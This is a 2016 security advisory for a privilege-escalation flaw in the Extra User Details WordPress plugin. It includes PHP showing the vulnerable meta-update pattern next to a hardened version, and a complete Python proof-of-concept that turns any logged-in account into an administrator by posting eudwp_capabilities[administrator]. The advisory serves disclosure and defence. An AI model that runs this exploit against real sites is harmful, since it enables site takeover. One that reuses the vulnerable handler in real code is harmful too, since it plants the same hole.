Extra User Details [Privilege Escalation]
Extra User Details plugin for WordPress suffers from a Privilege Escalation vulnerability
Description
Extra User Details plugin for WordPress suffers from a Privilege Escalation vulnerability.
The plugin hooks its eud_update_ExtraFields function to the profile_update WordPress action. This function does not check user capabilities and writes every value it finds in the POST data to the user's meta. The only condition is that the POST variable name carries the eud prefix, which is stripped before the value is stored in the database; the remainder of the name is used directly as the meta key.
An authenticated attacker who can edit their own profile can exploit this to overwrite the {prefix}_capabilities meta entry, which is where WordPress stores role assignments, and gain administrative privileges.
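The following is an added illustration of the flaw and of its fix; it is not the plugin's own code. The function names, the 'eud_demo_fields' option and the field layout are assumptions made for the example. The first handler reproduces the pattern the advisory describes (iterate over POST, strip the prefix, write the rest as a meta key); the second iterates over an allowlist of registered fields instead, so a POST key such as eudwp_capabilities is never looked at.

```php
<?php
// Added example, not code from the Extra User Details plugin.
// Function names and the 'eud_demo_fields' option are assumed.

// Vulnerable pattern: every POST key that starts with "eud" is trusted,
// the prefix is stripped and the remainder is used as the meta key.
// With the default table prefix, a POST field named
// eudwp_capabilities[administrator] becomes an update of wp_capabilities,
// the meta entry that holds the user's roles.
function eud_demo_update_vulnerable( $user_id ) {
    foreach ( $_POST as $key => $value ) {
        if ( 0 === strpos( $key, 'eud' ) ) {
            update_user_meta( $user_id, substr( $key, 3 ), $value );
        }
    }
}

// Hardened pattern: same hook, but the handler
//   1. requires the caller to be allowed to edit this user,
//   2. loops over the plugin's own allowlist of field keys, not over $_POST,
//   3. refuses keys that carry privileges or are protected meta,
//   4. accepts only scalar values and sanitizes them before storing.
function eud_demo_update_hardened( $user_id ) {
    global $wpdb;

    if ( ! current_user_can( 'edit_user', $user_id ) ) {
        return;
    }

    // Field keys the site administrator configured for the plugin
    // (assumed to be stored as an associative array in this option).
    $allowed = array_keys( (array) get_option( 'eud_demo_fields', array() ) );

    // Keys that must never be writable through a profile form, whatever
    // the configured allowlist says. get_blog_prefix() matches the prefix
    // WordPress itself uses for the capabilities meta key.
    $prefix    = $wpdb->get_blog_prefix();
    $forbidden = array( $prefix . 'capabilities', $prefix . 'user_level' );

    foreach ( $allowed as $meta_key ) {
        if ( in_array( $meta_key, $forbidden, true ) || is_protected_meta( $meta_key, 'user' ) ) {
            continue;
        }
        $post_key = 'eud' . $meta_key;
        if ( ! isset( $_POST[ $post_key ] ) || ! is_scalar( $_POST[ $post_key ] ) ) {
            continue;
        }
        $value = sanitize_text_field( wp_unslash( $_POST[ $post_key ] ) );
        update_user_meta( $user_id, $meta_key, $value );
    }
}

add_action( 'profile_update', 'eud_demo_update_hardened' );
```

Note that the capability check alone does not close this bug: WordPress lets every user edit their own profile, so current_user_can( 'edit_user', $user_id ) passes for the attacker in the PoC. What stops the escalation is iterating over the plugin's allowlist rather than over the request, plus the explicit refusal of the capabilities and user_level keys. The is_scalar() check also rejects the array value the PoC sends (eudwp_capabilities[administrator]).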
PoC
In the following PoC we assume that the database uses the wp_ table prefix, a very common scenario as this is the default WordPress value. The POST field eudwp_capabilities[administrator] therefore becomes the meta key wp_capabilities once the eud prefix is stripped.
#!/usr/bin/python3
################################################################################
# Extra User Details Privilege Escalation Exploit
#
# Author: Pan Vag <[email protected]>
#
# Dependencies: requests, BeautifulSoup (http://www.crummy.com/software/BeautifulSoup/)
################################################################################
import sys

import requests
from bs4 import BeautifulSoup

baseUrl = 'http://example.com'
loginUrl = baseUrl + '/wp-login.php'
profileUrl = baseUrl + '/wp-admin/profile.php'

# Credentials of any existing account; no special role is needed.
loginPostData = {
    'log': 'username',
    'pwd': 'password',
    'rememberme': 'forever',
    'wp-submit': 'Log+In'
}

s = requests.Session()
r = s.post(loginUrl, loginPostData)
# wp-login.php answers 200 on a failed login as well, so check for the
# wordpress_logged_in_* auth cookie instead of relying on the status code.
if r.status_code != 200 or not any(c.startswith('wordpress_logged_in') for c in s.cookies.keys()):
    print('Login error')
    sys.exit(1)

# Fetch the profile page to harvest the form fields, including the nonce
# (_wpnonce) that profile.php requires for a valid update.
r = s.get(profileUrl)
soup = BeautifulSoup(r.text, 'html.parser')
f = soup.find('form', {'id': 'your-profile'})
if not f:
    print('Error')
    sys.exit(1)

# The plugin strips the "eud" prefix and uses the rest as the meta key,
# so this field is written to wp_capabilities and grants the administrator role.
data = {
    'eudwp_capabilities[administrator]': 1,
}
for i in f.find_all('input'):
    if 'name' in i.attrs and 'value' in i.attrs and i.attrs['value']:
        data[i.attrs['name']] = i.attrs['value']

r = s.post(profileUrl, data)
if r.status_code == 200:
    print('Success')
    sys.exit(0)
Solution
Upgrade to v0.4.2.1
- Date: 13 February 2016
- Author: Pan Vag
- Vendor: vadimk.com
- Plugin: wordpress.org
- Affected version: 0.4.2
- Tested on: WordPress 4.4.2
- Timeline:
  - 2016-02-13: Vendor notified through wordpress.org support forums
  - 2016-02-13: Vendor notified through the contact form on his website
  - 2016-02-13: Vendor responded and received details about this issue
  - 2016-02-15: Vendor released v0.4.2.1, which resolves this issue